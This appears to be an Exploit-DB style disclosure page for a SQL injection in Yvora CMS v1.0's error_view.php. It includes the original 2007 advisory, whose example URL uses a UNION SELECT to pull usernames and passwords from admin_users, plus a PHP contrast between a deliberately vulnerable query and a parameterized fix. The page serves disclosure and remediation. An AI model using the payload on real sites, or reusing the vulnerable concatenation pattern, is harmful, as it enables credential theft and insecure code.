Vendor: Yvora CMS
By: k1tk4t
CVSS: 7.5 (HIGH)
Title: Remote SQL Injection
CWE:
Product Name: Yvora CMS
Affected Version From: Yvora CMS v1.0
Affected Version To: Yvora CMS v1.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2007

Yvora CMS v1.0 – Remote SQL Injection

This exploit allows an attacker to perform a remote SQL injection attack against Yvora CMS v1.0. The 'ID' parameter of the 'error_view.php' page is placed into a database query without validation, so an attacker can inject SQL through it (the advisory's example is a UNION SELECT against the admin_users table) and read sensitive information, such as usernames and passwords, out of the database.

Mitigation:

To mitigate this vulnerability, apply the vendor's patch or update for Yvora CMS when one is available (none is recorded on this page). Independently of that, the application should validate the 'ID' parameter as an integer and use parameterized queries so that user input can never be interpreted as SQL.
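As an added illustration (not Yvora CMS's own code), the following hypothetical error_view.php lookup shows the vulnerable shape the advisory describes next to a hardened version that validates the ID and binds it as a parameter; the table and column names, the seven-column SELECT and the connection details are assumptions.

```php
<?php
// Added example, not Yvora CMS source: a reconstructed error_view.php lookup.
// Table and column names are assumptions; the seven selected columns match the
// column count of the UNION in the advisory's example URL.

// VULNERABLE PATTERN: the raw ID query-string value is concatenated into SQL.
// A value such as "-99 UNION SELECT ..." rewrites the query, which is how the
// advisory reads admin credentials back out of the rendered page.
function lookup_error_vulnerable(mysqli $db, string $rawId): ?array
{
    $sql = "SELECT id, title, message, detail, reporter, created, status "
         . "FROM errors WHERE ID = " . $rawId;   // no validation, no binding
    $res = $db->query($sql);
    return $res ? ($res->fetch_assoc() ?: null) : null;
}

// HARDENED: check the type first, then bind the value as a parameter so the
// database driver never interprets it as part of the SQL text.
function lookup_error_hardened(mysqli $db, string $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);   // "-99 UNION SELECT ..." is rejected here
        return null;
    }
    $stmt = $db->prepare(
        "SELECT id, title, message, detail, reporter, created, status "
      . "FROM errors WHERE ID = ?"
    );
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Usage as the page would call it (assumed connection details):
// $db  = new mysqli('localhost', 'app_user', 'app_password', 'yvora');
// $row = lookup_error_hardened($db, $_GET['ID'] ?? '');
```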

Exploit-DB raw data:

########################################################################
# Yvora CMS v1.0 - Remote SQL Injection
# Vendor        : http://www.yvora.nl/
# Found By      : k1tk4t - k1tk4t[4t]newhack.org
# Location      : Indonesia   --  #newhack[dot]org @irc.dal.net
########################################################################
PoC;

http://www.victim.xxx/error_view.php?ID=[SQL]

Example;

http://www.victim.xxx/error_view.php?ID=-99+UNION+SELECT+1,2,3,password,username,6,7+from+admin_users/*

Result;

Error: Username
Query: Password

########################################################################
Thanks to;
str0ke
DNX,xoron,iFX,x-ace,nyubi,selikoer,k1ngk0ng
and all friends in the security & hacking community
-----------------------
-newhack[dot]org|staff-
mR.opt1lc,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX
-----------------------
all member newhack[dot]org
-----------------------
all member www.echo.or.id
-----------------------
all member www.yogyafree.net
-----------------------
all member www.sekuritionline.net
-----------------------
all member www.kecoak-elektronik.net
-----------------------
all Indonesian hacker & security communities
Love the Indonesian language

# milw0rm.com [2007-09-02]